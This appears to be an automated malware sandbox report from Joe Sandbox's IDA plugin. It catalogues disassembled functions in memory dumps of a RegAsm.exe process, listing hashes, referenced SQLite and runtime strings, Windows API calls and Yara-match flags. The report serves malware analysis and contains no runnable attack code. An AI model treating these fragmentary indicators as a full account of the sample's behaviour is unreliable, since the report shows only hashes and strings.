                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2528248365
                                                                                                                                                                                                                                                              • Opcode ID: 757a86d8ce88c06d2633164a65dc10f66ff4176c6777f01e2de83a75d5314aad
                                                                                                                                                                                                                                                              • Instruction ID: 817fc9be993925fe7b31262416cd1e3d5bbf00f0e7312be42eeece98608106db
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 757a86d8ce88c06d2633164a65dc10f66ff4176c6777f01e2de83a75d5314aad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC312AA81152818AD3158F24C400762BB61BF65708FACD5CDD4898F7A7E37BC4CBDBA6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s%s
                                                                                                                                                                                                                                                              • API String ID: 0-3252725368
                                                                                                                                                                                                                                                              • Opcode ID: 45f7598962aeaa789656a929ecb9a73440aad2e98777027e4c9332779e5eae8c
                                                                                                                                                                                                                                                              • Instruction ID: 87cf02d061667c3a66ebced39546812c91905bea315f2c5c245f16029079ed70
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45f7598962aeaa789656a929ecb9a73440aad2e98777027e4c9332779e5eae8c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D811AF769002A0AFD7019F7CDC88A5633ACFF8169AF090129FD4DD6244D7359959C7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0040DDF3
                                                                                                                                                                                                                                                                • Part of subcall function 0041D040: std::exception::exception.LIBCMT ref: 0041D055
                                                                                                                                                                                                                                                                • Part of subcall function 0041D040: __CxxThrowException@8.LIBCMT ref: 0041D06A
                                                                                                                                                                                                                                                                • Part of subcall function 0041D040: std::exception::exception.LIBCMT ref: 0041D07B
                                                                                                                                                                                                                                                                • Part of subcall function 0040DD75: std::_Xinvalid_argument.LIBCPMT ref: 0040DD86
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040DE4E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                                                                              • String ID: K@$invalid string position
                                                                                                                                                                                                                                                              • API String ID: 214693668-1222066322
                                                                                                                                                                                                                                                              • Opcode ID: 28e7152ac8d5654cb071a5c65bb2cff8fa7fa8ee5ccd420e5882225f09a92f80
                                                                                                                                                                                                                                                              • Instruction ID: 8bbf7088a43f5d4e59009c46584d56dd8ee22e0dd6907cf777bb418e1553b03f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28e7152ac8d5654cb071a5c65bb2cff8fa7fa8ee5ccd420e5882225f09a92f80
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A110831B0461097CB149E98DC40A6AB7A5EBA5714F10053FF512AF2C1DB78D945C7DD
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: F$YHI;
                                                                                                                                                                                                                                                              • API String ID: 0-79577134
                                                                                                                                                                                                                                                              • Opcode ID: cd7d9f1c980c305fd36c7bfe6f54a9431e18a6499bd1913d7a0bb1a6907c238c
                                                                                                                                                                                                                                                              • Instruction ID: 45f2b6c82792386342a6a23a41f674d1f620b499db3d81de3330494e41ef2813
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7d9f1c980c305fd36c7bfe6f54a9431e18a6499bd1913d7a0bb1a6907c238c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44113DB56083408FD704DF29C45175FBBE4AFD8214F88882EE88A87290E779E548CB93
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • JSON path error near '%q', xrefs: 198D1F92
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: JSON path error near '%q'
                                                                                                                                                                                                                                                              • API String ID: 0-481711382
                                                                                                                                                                                                                                                              • Opcode ID: 886de46f0337bba5c9103697b4d02b8716ab2ae8b6e993b025226d791cc2dced
                                                                                                                                                                                                                                                              • Instruction ID: bcc4724ef4987aea78553d888a0079092a7eb6acb4a01c1e4e7faecd63b77357
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 886de46f0337bba5c9103697b4d02b8716ab2ae8b6e993b025226d791cc2dced
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 730104B26092117FDB289A688C00B9B7BD4EF41730F28466CF495962D0EB71B841C3A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19831E53
                                                                                                                                                                                                                                                              • misuse, xrefs: 19831E59
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 19831E63
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-3564305576
                                                                                                                                                                                                                                                              • Opcode ID: 0a1906d73207f558ce61fbf1d1841cbc0b6a11db3f26222ae22eb8aab22e88c7
                                                                                                                                                                                                                                                              • Instruction ID: 5e796d2158bbed2c6d0ddf07d661199cb2efe9c05b7b38e984f584cf747299ed
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a1906d73207f558ce61fbf1d1841cbc0b6a11db3f26222ae22eb8aab22e88c7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6211E0746085A09FD304DE38D844A56BBB8BF96F46F4C045CE045CB322C336EA09C7E2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1984F105
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                                                                                                                                                                                                              • API String ID: 0-2312637080
                                                                                                                                                                                                                                                              • Opcode ID: 8733d4323bb25e5110dda30ba5c01e322942fcac6a97825f2ac831515a8163c6
                                                                                                                                                                                                                                                              • Instruction ID: 7faad72445b4834c44e96608e79f5f2c62b90b8604ed7f0eccc77acbfce9b373
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8733d4323bb25e5110dda30ba5c01e322942fcac6a97825f2ac831515a8163c6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A01B13A3042415FD3628A6EFC84F97B7E8EBD4620F1D046EF5ADC3201D361A88593A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 19850D87
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                                                                                                                                                                                                              • API String ID: 0-2312637080
                                                                                                                                                                                                                                                              • Opcode ID: 646d5b929cf5b63477b04f10e33060be8b172283899f5433cf38f47e20bda40a
                                                                                                                                                                                                                                                              • Instruction ID: f7a4690a790f86e0ccd2ac3cce3000c21813ed6fab39d35d08bea2d9be00b1e4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 646d5b929cf5b63477b04f10e33060be8b172283899f5433cf38f47e20bda40a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7018176204204AFE3509A5DEC80F42B7E9EB88714F58455DF54DD7280D776FC86C750
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s_stat
                                                                                                                                                                                                                                                              • API String ID: 0-920702477
                                                                                                                                                                                                                                                              • Opcode ID: 6bdd0e9ec9f709b23b493a18e1129689f7fc2b3416acc2318971bf0a7fd1ce1b
                                                                                                                                                                                                                                                              • Instruction ID: 66aabd7230a29cc94fdca9f48ca420bc925fa3c8ed325b68e3f9556ca221291a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bdd0e9ec9f709b23b493a18e1129689f7fc2b3416acc2318971bf0a7fd1ce1b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF02733A082523BD70046BDFC80B46EBD9BB90560F9C862AE40C92144D326BCE183D1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 19847F76
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
                                                                                                                                                                                                                                                              • API String ID: 0-3072645960
                                                                                                                                                                                                                                                              • Opcode ID: 1ff8609794c930cd2cc36cd238638aeab33a88679b1755f3cd785b88dd9c0d70
                                                                                                                                                                                                                                                              • Instruction ID: de6602003c22cbeb465a0e8af2e0b8b1e6237833f22248b76185b2d420b5f57e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ff8609794c930cd2cc36cd238638aeab33a88679b1755f3cd785b88dd9c0d70
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13F0F67B60430247D7005F18FC01B8A77D4AFE0321FAD413EF8449B180E761E88A87A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,0040FB2C,00000000), ref: 0040F739
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0040FB2C,00000000), ref: 0040F740
                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F751
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                              • Opcode ID: decaaf6b8d3bdfb4ebfc7dc505aacbf9abaaa4ede5b0c59ee062add5b7845f6a
                                                                                                                                                                                                                                                              • Instruction ID: d92555dba5bd375428afbadb2c2e0f07a688df5fab51d2089fb10193fcd4bcdb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: decaaf6b8d3bdfb4ebfc7dc505aacbf9abaaa4ede5b0c59ee062add5b7845f6a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FD0A731740324BBD62027E4BC0EF667F6CEB05BA2F400030FA0DC6152C961441187EE
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19926B50
                                                                                                                                                                                                                                                              • cannot open file, xrefs: 19926B59
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 19926B5E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
